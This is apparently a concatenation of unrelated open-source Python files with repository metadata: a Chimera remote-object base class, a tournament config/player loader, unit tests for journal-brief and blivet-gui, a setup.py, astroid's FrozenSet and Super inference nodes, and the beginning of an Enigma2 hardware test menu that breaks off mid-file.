from chimera.core.remoteobject import RemoteObject
from chimera.core.config import Config
from chimera.core.eventsproxy import EventsProxy
from chimera.core.state import State
from chimera.core.location import Location
from chimera.core.constants import EVENTS_ATTRIBUTE_NAME
from chimera.core.constants import METHODS_ATTRIBUTE_NAME
from chimera.core.constants import CONFIG_PROXY_NAME
from chimera.core.constants import INSTANCE_MONITOR_ATTRIBUTE_NAME
from chimera.core.constants import RWLOCK_ATTRIBUTE_NAME
from chimera.interfaces.lifecycle import ILifeCycle
import chimera.core.log
import logging
import time
import threading
__all__ = ['ChimeraObject']
class ChimeraObject (RemoteObject, ILifeCycle):
    """Base class for Chimera remote objects: config, events, locking, life cycle.

    Configuration access (__getitem__/__setitem__/__iadd__) is guarded by the
    object's read/write lock; the monitor protocol (acquire/wait/notify/...)
    delegates to the per-instance monitor attribute installed by MetaObject.
    """
    # Python 2 metaclass hook; MetaObject installs events/methods/config/lock
    # attributes referenced throughout this class.
    __metaclass__ = MetaObject
    def __init__ (self):
        RemoteObject.__init__(self)
        # event handling
        self.__events_proxy__ = EventsProxy ()
        # configuration handling
        self.__config_proxy__ = Config (self)
        self.__state__ = State.STOPPED
        self.__location__ = ""
        # logging.
        # put every logger on behalf of chimera's logger so
        # we can easily setup levels on all our parts
        logName = self.__module__
        if not logName.startswith("chimera."):
            logName = "chimera."+logName+" (%s)" % logName
        self.log = logging.getLogger(logName)
        # Hz: control-loop frequency used by __main__ (see getHz/setHz)
        self._Hz = 2
        self._loop_abort = threading.Event()
    # config implementation
    def __getitem__ (self, item):
        """Read a config value; any thread may read when no writer holds the lock."""
        # any thread can read if none writing at the time
        lock = getattr(self, RWLOCK_ATTRIBUTE_NAME)
        try:
            lock.acquireRead()
            return self.__config_proxy__.__getitem__ (item)
        finally:
            lock.release()
    def __setitem__ (self, item, value):
        """Write a config value; writers are exclusive."""
        # only one thread can write
        lock = getattr(self, RWLOCK_ATTRIBUTE_NAME)
        try:
            lock.acquireWrite()
            return self.__config_proxy__.__setitem__ (item, value)
        finally:
            lock.release()
    # bulk configuration (pass a dict to config multiple values)
    def __iadd__ (self, configDict):
        """Apply a dict of config values atomically; returns the proxy (obj += {...})."""
        # only one thread can write
        lock = getattr(self, RWLOCK_ATTRIBUTE_NAME)
        try:
            lock.acquireWrite()
            self.__config_proxy__.__iadd__ (configDict)
        finally:
            lock.release()
        return self.getProxy()
    # locking: delegate the context-manager/monitor protocol to the
    # per-instance monitor attribute.
    def __enter__ (self):
        return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).__enter__()
    def __exit__ (self, *args):
        return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).__exit__(*args)
    def acquire(self, blocking=True):
        return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).acquire(blocking)
    def release(self):
        return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).release()
    def wait(self, timeout=None):
        return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).wait(timeout)
    def notify(self, n=1):
        return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).notify(n)
    def notifyAll(self):
        return getattr(self, INSTANCE_MONITOR_ATTRIBUTE_NAME).notifyAll()
    # reflection
    def __get_events__ (self):
        return getattr(self, EVENTS_ATTRIBUTE_NAME)
    def __get_methods__ (self):
        return getattr(self, METHODS_ATTRIBUTE_NAME)
    def __get_config__ (self):
        return getattr(self, CONFIG_PROXY_NAME).items()
    # ILifeCycle implementation
    def __start__ (self):
        """Hook called on startup; subclasses override. Return True on success."""
        return True
    def __stop__ (self):
        """Hook called on shutdown; subclasses override. Return True on success."""
        return True
    def getHz (self):
        return self._Hz
    def setHz (self, freq):
        """Set the control-loop frequency; returns the previous value."""
        tmpHz = self.getHz()
        self._Hz = freq
        return tmpHz
    def __main__ (self):
        """Control loop: call control() at ~Hz until it returns False or abort is set."""
        self._loop_abort.clear()
        timeslice = 0.5
        runCondition = True
        while runCondition:
            runCondition = self.control()
            if self._loop_abort.isSet():
                return True
            # FIXME: better idle loop
            # we can't sleep for the whole time because
            # if object set a long sleep time and Manager decides to
            # shutdown, we must be asleep to receive his message and
            # return.
            timeToWakeUp = 1.0/self.getHz()
            sleeped = 0
            while sleeped < timeToWakeUp:
                time.sleep(timeslice)
                if self._loop_abort.isSet(): return True
                sleeped += timeslice
        return True
    def __abort_loop__ (self):
        """Ask the control loop in __main__ to stop at its next check point."""
        self._loop_abort.set()
    def control (self):
        """Periodic work hook; subclasses override. Return False to stop the loop."""
        return False
    def getState (self):
        return self.__state__
    def __setstate__ (self, state):
        """Set the life-cycle state; returns the previous state."""
        oldstate = self.__state__
        self.__state__ = state
        return oldstate
    def getLocation (self):
        return self.__location__
    def __setlocation__ (self, location):
        """Set this object's Location and derive its GUID from class/name."""
        location = Location(location)
        self.__location__ = location
        self.setGUID("/%s/%s" % (location.cls, location.name))
        return True
    def getManager (self):
        # Returns None when no daemon is attached.
        if self.getDaemon():
            return self.getDaemon().getProxyForObj(self.getDaemon().getManager())
    def getProxy (self):
        # just to put everything together (no need to change the base implementation)
        return super(ChimeraObject, self).getProxy()
    def getGUID(self):
        return self.objectGUID
    def getMetadata(self, request):
        """FITS-style metadata hook; subclasses override. Default: no metadata."""
        return []
|
wschoenell/chimera_imported_googlecode
|
src/chimera/core/chimeraobject.py
|
Python
|
gpl-2.0
| 6,427
|
import os
import sys
# Pool type enum
class PoolType:
    """Enum-like constants naming the two supported tournament pool formats."""
    BRACKET = 1      # single/double elimination bracket
    ROUND_ROBIN = 2  # everyone plays everyone
# Load functions.
def ParseConfigLine(line, config_types):
    """Parse one whitespace-separated "field value" config line.

    config_types maps field names to 'string', 'int', 'float' or 'bool';
    unlisted fields are treated as strings. Returns (field, typed_value),
    or (None, None) when the line is malformed or the type is unknown.
    """
    pieces = [piece.strip() for piece in line.split()]
    pieces = [piece for piece in pieces if piece]
    if len(pieces) != 2:
        return (None, None)
    field, value = pieces[0], pieces[1]
    if field not in config_types or config_types[field] == 'string':
        return (field, value)
    elif config_types[field] == 'int':
        return (field, int(value))
    elif config_types[field] == 'float':
        return (field, float(value))
    elif config_types[field] == 'bool':
        # BUG FIX: the original used bool(value), which is True for every
        # non-empty string (including "False"). Compare the text instead.
        return (field, value.lower() in ('true', '1', 'yes'))
    else:
        return (None, None)
def LoadConfig(config, config_types):
    """Overlay settings from config["config_file"] onto the config dict in place.

    Missing file is not an error: defaults already in `config` are kept.
    """
    try:
        with open(config["config_file"]) as f:
            VerifyEncoding(f, "Config")
            line_num = 1
            for line in f:
                if not IsCommentLine(line):
                    try:
                        field, value = ParseConfigLine(line, config_types)
                        if not field == None and not value == None:
                            print "Found config setting: " + field + ": \"" + str(value) + "\" " + str(type(value))
                            config[field] = value
                        else:
                            print "Skipping config line:", line_num
                    except ValueError:
                        # int()/float() conversion failed inside ParseConfigLine
                        print "Could not parse config line:", line_num
                line_num += 1
            print "Loaded config settings"
            print "-"*60
    except IOError:
        print "No config file found. Using default configuration."
def LoadPlayers(config, player_map):
    """Populate player_map from config["player_in_file"] (CSV: 3 fields per line).

    Exits the program if the file is missing or fewer than 2 players are found.
    """
    try:
        with open(config["player_in_file"]) as f:
            VerifyEncoding(f, "Players")
            line_num = 1
            for line in f:
                if not IsCommentLine(line):
                    split_line = line.split(",")
                    for i in xrange(len(split_line)):
                        split_line[i] = split_line[i].strip()
                    split_line = filter(None, split_line)
                    if len(split_line) == 3:
                        try:
                            player_map.AddPlayerRaw(split_line[0], split_line[1], split_line[2])
                        except ValueError:
                            print "Count not parse player line:", line_num
                    else:
                        print "Skipping player line:", line_num
                        print split_line
                line_num += 1
            print "Loaded player data. Players found:", player_map.num_players
    except IOError:
        print "No player data file found. Exiting."
        sys.exit(0)
    if len(player_map.player_list) < 2:
        print "Not enough players found. Exiting."
        sys.exit(0)
def IsCommentLine(line):
    """Return True when the first non-whitespace character of `line` is '#'."""
    return line.lstrip().startswith('#')
def VerifyEncoding(file, type):
    """Exit the program unless the first line of `file` decodes as UTF-8.

    `type` is a label ("Config"/"Players") used in the error message.
    NOTE: both parameters shadow builtins of the same name.
    """
    line = file.readline()
    try:
        # Python 2: byte-str -> unicode decode as an encoding sanity check.
        line.decode('utf8')
    except UnicodeDecodeError:
        print type, "file is not UTF-8. Please save players file as UTF-8."
        sys.exit(0)
    # Rewind so the caller reads from the beginning again.
    file.seek(0)
# Output functions.
def PrintStr(param):
    """Print the first element of `param` (a one-element parameter tuple/list)."""
    print param[0]
def WriteStr(param):
    """Write param[0] (text) to the path param[1], creating parent dirs as needed.

    Errors are reported on stdout and swallowed; nothing is raised.
    """
    if not len(param) == 2:
        print "Write error: Incorrect number of params."
        return
    str_out, filepath = param[0], param[1]
    if filepath == None:
        print "Write error: No filepath."
        return
    try:
        # Create the destination directory if it does not exist yet.
        if not os.path.exists(os.path.dirname(filepath)):
            os.makedirs(os.path.dirname(filepath))
        with open(filepath, "w") as f:
            f.write(str_out)
        print "Wrote to: " + filepath
    except IOError:
        print "Write error: File not found: " + filepath + " Skipping."
# This module is a library; the real entry point lives in seeding.py.
if __name__ == "__main__":
    print "Run seeding.py"
# Debug verification in case something is really messed up and there are duplicate players. (Cava is not The Brig no matter how much he wishes he was).
def VerifyPlayers(players):
    """Sanity check: report every duplicate pair, then crash if any were found."""
    error = False
    # O(n^2) pairwise comparison; fine for tournament-sized lists.
    for i in xrange(0, len(players)-1):
        for j in xrange(i+1, len(players)):
            if players[i] == players[j]:
                print "ERROR", players[i], players[j]
                print players
                error = True
    if error:
        # Deliberate AttributeError used as a crude debug trap: halts with a
        # traceback after the duplicates have been printed.
        None.duplicate_player
|
aalberg/regional-seeding
|
src/util.py
|
Python
|
gpl-2.0
| 3,895
|
"""
Copyright (c) 2015 Tim Waugh <tim@cyberelk.net>
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
import functools
from inspect import getsourcefile
import os
import sys
def mock_systemd():
    """Make the bundled mock 'systemd' package importable.

    The mock lives in the directory of the tests.missing module; appending
    that directory to sys.path lets `from systemd import journal` resolve.
    """
    import tests.missing
    missing_dir = os.path.dirname(getsourcefile(tests.missing))
    sys.path.append(missing_dir)
def maybe_mock_systemd():
    """Install the mock systemd package only when the real one is absent."""
    try:
        from systemd import journal  # noqa: F401
    except ImportError:
        # python-systemd is not installed; fall back to the bundled mock.
        mock_systemd()
class Watcher(object):
    """Records invocations made through wrappers produced by watch_call()."""

    def __init__(self):
        # Each entry is (func, positional-args tuple, repr of keyword args).
        self.calls = []

    def watch_call(self, func):
        """Return a callable that records its arguments (func is NOT invoked)."""
        return functools.partial(self.called, func)

    def called(self, func, *args, **kwargs):
        record = (func, args, repr(kwargs))
        self.calls.append(record)
|
twaugh/journal-brief
|
tests/util.py
|
Python
|
gpl-2.0
| 1,376
|
# -*- coding: utf-8 -*-
import unittest
from unittest.mock import MagicMock
import os
from blivetgui.i18n import _, P_
from blivetgui.list_actions import ListActions
@unittest.skipUnless("DISPLAY" in os.environ.keys(), "requires X server")
class ListActionsTest(unittest.TestCase):
    """Unit tests for ListActions, with the BlivetGUI main object mocked out."""
    # State mirrored from ListActions through the mocked callbacks below.
    buttons_state = None
    actions_label = None
    def _set_buttons_state(self, state):
        # Stand-in for blivet_gui.activate_action_buttons
        self.buttons_state = state
    def _set_actions_label(self, label):
        # Stand-in for blivet_gui.label_actions.set_markup
        self.actions_label = label
    def setUp(self):
        """Build a mocked blivet_gui and a fresh ListActions for every test."""
        self.blivet_gui = MagicMock()
        self.blivet_gui.configure_mock(activate_action_buttons=self._set_buttons_state)
        self.blivet_gui.configure_mock(label_actions=MagicMock(set_markup=self._set_actions_label))
        self.actions_list = ListActions(self.blivet_gui)
        self.actions_list.initialize()
    def test_initial_state(self):
        """A fresh list has no actions, disabled buttons and the 'no pending' label."""
        self.assertFalse(self.buttons_state)
        self.assertIn(_("No pending actions"), self.actions_label)
        self.assertEqual(self.actions_list.actions, 0)
        self.assertEqual(len(self.actions_list.history), 0)
    def test_append(self):
        """Appending one entry (two blivet actions) updates count, history, UI."""
        action1 = MagicMock()
        action2 = MagicMock()
        self.actions_list.append(action_type="add", action_desc="add", blivet_actions=[action1, action2])
        self.assertEqual(self.actions_list.actions, 1)
        self.assertEqual(len(self.actions_list.history), 1)
        self.assertTrue([action1, action2] in self.actions_list.history)
        self.assertTrue(self.buttons_state)
        self.assertIn(P_("%s pending action", "%s pending actions", 1) % 1, self.actions_label)
    def test_pop(self):
        """pop() removes entries LIFO and restores the empty-state UI at the end."""
        action1 = MagicMock()
        self.actions_list.append(action_type="add", action_desc="add", blivet_actions=[action1])
        action2 = MagicMock()
        self.actions_list.append(action_type="add", action_desc="add", blivet_actions=[action2])
        # pop action2 from the list
        pop = self.actions_list.pop()
        self.assertEqual(pop, [action2])
        self.assertEqual(self.actions_list.actions, 1)
        self.assertEqual(len(self.actions_list.history), 1)
        self.assertTrue([action1] in self.actions_list.history)  # action1 should stay there
        self.assertFalse([action2] in self.actions_list.history)  # action2 shouldn't
        self.assertTrue(self.buttons_state)
        self.assertIn(P_("%s pending action", "%s pending actions", 1) % 1, self.actions_label)
        # pop action1 from the list
        pop = self.actions_list.pop()
        self.assertEqual(pop, [action1])
        self.assertEqual(self.actions_list.actions, 0)
        self.assertEqual(len(self.actions_list.history), 0)
        self.assertFalse(self.buttons_state)
        self.assertIn(_("No pending actions"), self.actions_label)
    def test_clear(self):
        """clear() drops everything and restores the empty-state UI."""
        action1 = MagicMock()
        self.actions_list.append(action_type="add", action_desc="add", blivet_actions=[action1])
        self.actions_list.clear()
        self.assertEqual(self.actions_list.actions, 0)
        self.assertEqual(len(self.actions_list.history), 0)
        self.assertFalse(self.buttons_state)
        self.assertIn(_("No pending actions"), self.actions_label)
# Allow running this test module directly: ``python list_actions_test.py``.
if __name__ == "__main__":
    unittest.main()
|
rhinstaller/blivet-gui
|
tests/blivetgui_tests/list_actions_test.py
|
Python
|
gpl-2.0
| 3,259
|
#!/usr/bin/env python
# MusicLibraryPy - Tools to analyse and repair/update music libraries
# Copyright © 2016 Rob Hardwick
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# NOTE: ``install_requires`` is a setuptools extension -- plain distutils
# ignores it (emitting only an "Unknown distribution option" warning), so the
# dependencies declared below were never enforced on install.  Prefer
# setuptools when available and fall back to distutils otherwise.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

setup(
    name='MusicLibraryPy',
    version='0.1',
    description='Tools to analyse and repair/update music libraries',
    author='Rob Hardwick',
    author_email='robhardwick@gmail.com',
    url='https://github.com/robhardwick/music-library-py',
    scripts=[
        'tools/music-library-report',
        'tools/music-library-update',
    ],
    install_requires=[
        'mutagen>=1.31',
        'python-magic>=0.4.11',
    ],
    packages=['musiclibrary'])
|
robhardwick/music-library-py
|
setup.py
|
Python
|
gpl-2.0
| 1,122
|
# copyright 2003-2015 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This file is part of astroid.
#
# astroid is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# astroid is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with astroid. If not, see <http://www.gnu.org/licenses/>.
"""
Inference objects are a way to represent composite AST nodes,
which are used only as inference results, so they can't be found in the
original AST tree. For instance, inferring the following frozenset use,
leads to an inferred FrozenSet:
Call(func=Name('frozenset'), args=Tuple(...))
"""
import six
from astroid import bases
from astroid import decorators
from astroid import exceptions
from astroid import MANAGER
from astroid import node_classes
from astroid import scoped_nodes
from astroid import util
BUILTINS = six.moves.builtins.__name__
class FrozenSet(node_classes._BaseContainer):
    """Composite node representing a ``frozenset`` literal produced by inference."""

    def pytype(self):
        # Fully qualified type name, e.g. "builtins.frozenset".
        return BUILTINS + '.frozenset'

    def _infer(self, context=None):
        # A FrozenSet node infers to itself.
        yield self

    @decorators.cachedproperty
    def _proxied(self):
        # The builtins module is always present in the astroid cache; proxy
        # attribute access through the real ``frozenset`` class definition.
        ast_builtins = MANAGER.astroid_cache[BUILTINS]
        return ast_builtins.getattr('frozenset')[0]
class Super(node_classes.NodeNG):
    """Proxy class over a super call.
    This class offers almost the same behaviour as Python's super,
    which is MRO lookups for retrieving attributes from the parents.
    The *mro_pointer* is the place in the MRO from where we should
    start looking, not counting it. *mro_type* is the object which
    provides the MRO, it can be both a type or an instance.
    *self_class* is the class where the super call is, while
    *scope* is the function where the super call is.
    """
    def __init__(self, mro_pointer, mro_type, self_class, scope):
        # The object providing the MRO (a ClassDef or an Instance).
        self.type = mro_type
        # The class after which the MRO lookup starts.
        self.mro_pointer = mro_pointer
        # Set to True for the ``super(type, type)`` form (see super_mro()).
        self._class_based = False
        self._self_class = self_class
        self._scope = scope
        # Special attributes mirroring CPython's super object model; served
        # directly by igetattr() without an MRO lookup.
        self._model = {
            '__thisclass__': self.mro_pointer,
            '__self_class__': self._self_class,
            '__self__': self.type,
            '__class__': self._proxied,
        }
    def _infer(self, context=None):
        # A Super node infers to itself.
        yield self
    def super_mro(self):
        """Get the MRO which will be used to lookup attributes in this super."""
        if not isinstance(self.mro_pointer, scoped_nodes.ClassDef):
            raise exceptions.SuperError(
                "The first argument to super must be a subtype of "
                "type, not {mro_pointer}.", super_=self)
        if isinstance(self.type, scoped_nodes.ClassDef):
            # `super(type, type)`, most likely in a class method.
            self._class_based = True
            mro_type = self.type
        else:
            mro_type = getattr(self.type, '_proxied', None)
            if not isinstance(mro_type, (bases.Instance, scoped_nodes.ClassDef)):
                raise exceptions.SuperError(
                    "The second argument to super must be an "
                    "instance or subtype of type, not {type}.",
                    super_=self)
        if not mro_type.newstyle:
            raise exceptions.SuperError("Unable to call super on old-style classes.", super_=self)
        mro = mro_type.mro()
        if self.mro_pointer not in mro:
            raise exceptions.SuperError(
                "The second argument to super must be an "
                "instance or subtype of type, not {type}.",
                super_=self)
        # Lookup starts *after* mro_pointer, mirroring CPython semantics.
        index = mro.index(self.mro_pointer)
        return mro[index + 1:]
    @decorators.cachedproperty
    def _proxied(self):
        # Proxy through the real builtin ``super`` class definition.
        builtins = MANAGER.astroid_cache[BUILTINS]
        return builtins.getattr('super')[0]
    def pytype(self):
        return '%s.super' % BUILTINS
    def display_type(self):
        return 'Super of'
    @property
    def name(self):
        """Get the name of the MRO pointer."""
        return self.mro_pointer.name
    def igetattr(self, name, context=None):
        """Retrieve the inferred values of the given attribute name."""
        # Special attributes (__self__, __thisclass__, ...) come straight
        # from the model dict, bypassing the MRO walk.
        local_name = self._model.get(name)
        if local_name:
            yield local_name
            return
        try:
            mro = self.super_mro()
            # Don't let invalid MROs or invalid super calls
            # leak out as is from this function.
        except exceptions.SuperError as exc:
            util.reraise(exceptions.AttributeInferenceError(
                ('Lookup for {name} on {target!r} because super call {super!r} '
                'is invalid.'),
                target=self, attribute=name, context=context, super_=exc.super_))
        except exceptions.MroError as exc:
            util.reraise(exceptions.AttributeInferenceError(
                ('Lookup for {name} on {target!r} failed because {cls!r} has an '
                'invalid MRO.'),
                target=self, attribute=name, context=context, mros=exc.mros,
                cls=exc.cls))
        found = False
        for cls in mro:
            if name not in cls.locals:
                continue
            found = True
            for inferred in bases._infer_stmts([cls[name]], context, frame=self):
                if not isinstance(inferred, scoped_nodes.FunctionDef):
                    yield inferred
                    continue
                # We can obtain different descriptors from a super depending
                # on what we are accessing and where the super call is.
                if inferred.type == 'classmethod':
                    yield bases.BoundMethod(inferred, cls)
                elif self._scope.type == 'classmethod' and inferred.type == 'method':
                    yield inferred
                elif self._class_based or inferred.type == 'staticmethod':
                    yield inferred
                else:
                    yield bases.BoundMethod(inferred, cls)
        if not found:
            raise exceptions.AttributeInferenceError(target=self,
                                                     attribute=name,
                                                     context=context)
    def getattr(self, name, context=None):
        return list(self.igetattr(name, context=context))
|
pylint-bot/astroid-unofficial
|
astroid/objects.py
|
Python
|
gpl-2.0
| 6,789
|
from Screen import Screen
from Components.ChoiceList import ChoiceEntryComponent, ChoiceList
from Components.Sources.StaticText import StaticText
from Components.ActionMap import ActionMap, NumberActionMap
from Components.Label import MultiColorLabel, Label
from Components.config import ConfigIP, NoSave, configfile, config, Config, ConfigSubsection
from Components.Network import iNetwork
from Components.Console import Console
from Components.Harddisk import harddiskmanager
from Components.About import about
from Components.FanControl import fancontrol
from Components.Sensors import sensors
from Components.Sources.Sensor import SensorSource
from Components.NimManager import nimmanager, InitNimManager
from Tools.HardwareInfo import HardwareInfo
from Screens.MessageBox import MessageBox
from Screens.Standby import QuitMainloopScreen
from Plugins.SystemPlugins.Videomode.VideoHardware import video_hw
from enigma import eTimer, eServiceReference, eDVBDB, quitMainloop
from enigma import eDVBResourceManager, iDVBFrontend
from enigma import eDVBCI_UI, eDVBCIInterfaces
from enigma import eDVBVolumecontrol
import os, fcntl, array, socket, struct
class TestMenu(Screen):
# 1.0.0 -
# 1.0.1 - alpumr check removed
# 1.0.2 - optimussos1, optimussos2 model added.
# 1.0.3 - de language update.
TEST_PROG_VERSION = "1.0.3"
skin = """
<screen name="TestMenu" position="fill" title="Test Menu" flags="wfNoBorder">
<eLabel position="fill" backgroundColor="transpBlack" zPosition="-50"/>
<widget name="label0" position="80,55" size="540,29" foregroundColor="#0006c8f3" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="menulist" position="80,90" size="540,240" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" backgroundColorSelected="white" foregroundColorSelected="black" />
<widget name="lan_i" position="80,350" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sc0_i" position="80,380" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sc1_i" position="80,410" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="ci0_i" position="80,440" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="ci1_i" position="80,470" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sata_i" position="80,500" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb0_i" position="80,530" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb1_i" position="80,560" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb2_i" position="80,590" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="lan_s" position="280,350" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sc0_s" position="280,380" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sc1_s" position="280,410" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="ci0_s" position="280,440" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="ci1_s" position="280,470" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="sata_s" position="280,500" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb0_s" position="280,530" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb1_s" position="280,560" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="usb2_s" position="280,590" size="340,29" foregroundColors="#00ff4500,#007fff00" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="label1" position="640,055" size="540,29" foregroundColor="#0006c8f3" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="mac_i" position="640,090" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="info0_i" position="640,120" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="info1_i" position="640,150" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="micom_i" position="640,180" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="security0_i" position="640,210" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="security1_i" position="640,240" size="199,29" foregroundColor="white" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="mac_s" position="840,090" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="info0_s" position="840,120" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="info1_s" position="840,150" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="micom_s" position="840,180" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="security0_s" position="840,210" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="security1_s" position="840,240" size="340,29" foregroundColors="white,#00ff4500" backgroundColor="#40000000" font="Regular;22" zPosition="1" />
<widget name="button_left" position="840,430" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_right" position="925,430" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_down" position="1010,430" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_up" position="1095,430" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_power" position="840,450" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_menu" position="925,450" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_ok" position="1010,450" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_exit" position="1095,450" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<widget name="button_info" position="840,480" size="84,19" foregroundColors="#00ff4500,#0070ff00" backgroundColor="#40000000" font="Regular;18" zPosition="1" halign="center" />
<eLabel name="snr" position="840,350" size="340,19" halign="left" transparent="1" text="SNR" font="Regular;18" />
<widget source="session.FrontendStatus" render="Progress" pixmap="PLi-HD/infobar/pbar_grey.png" backgroundColor="#40000000" position="840,350" size="340,19" >
<convert type="FrontendInfo">SNR</convert>
</widget>
<widget source="session.FrontendStatus" render="Label" position="840,350" size="340,19" backgroundColor="#40000000" transparent="1" halign="right" font="Regular;18" >
<convert type="FrontendInfo">SNR</convert>
</widget>
<eLabel name="agc" position="840,370" size="84,19" backgroundColor="#40000000" halign="left" text="AGC" font="Regular;18" />
<widget source="session.FrontendStatus" render="Label" position="925,370" size="84,19" backgroundColor="#40000000" font="Regular;18">
<convert type="FrontendInfo">AGC</convert>
</widget>
<eLabel name="ber" position="1011,370" size="84,19" backgroundColor="#40000000" halign="left" text="BER" font="Regular;18" />
<widget source="session.FrontendStatus" render="Label" position="1096,370" size="84,19" backgroundColor="#40000000" font="Regular;18">
<convert type="FrontendInfo">BER</convert>
</widget>
<widget source="SensorFanText0" render="Label" position="840,400" size="84,19" font="Regular;18" backgroundColor="#40000000" />
<widget source="SensorFan0" render="Label" position="925,400" size="84,19" font="Regular;18" backgroundColor="#40000000" >
<convert type="SensorToText"></convert>
</widget>
<widget source="SensorTempText0" render="Label" position="1011,400" size="84,19" font="Regular;18" backgroundColor="#40000000" />
<widget source="SensorTemp0" render="Label" position="1096,400" size="84,19" font="Regular;18" backgroundColor="#40000000" >
<convert type="SensorToText"></convert>
</widget>
</screen>"""
CARD_LIST = {
chr(0x3b) + chr(0x9f) + chr(0x21) + chr(0x0e) + chr(0x49) + chr(0x52) + chr(0x44) : "Irdeto",
chr(0x3b) + chr(0xf7) + chr(0x11) + chr(0x00) : "Seca",
chr(0x3b) + chr(0x78) + chr(0x12) : "Cryptoworks",
chr(0x3b) + chr(0x26) + chr(0x00) : "Conax",
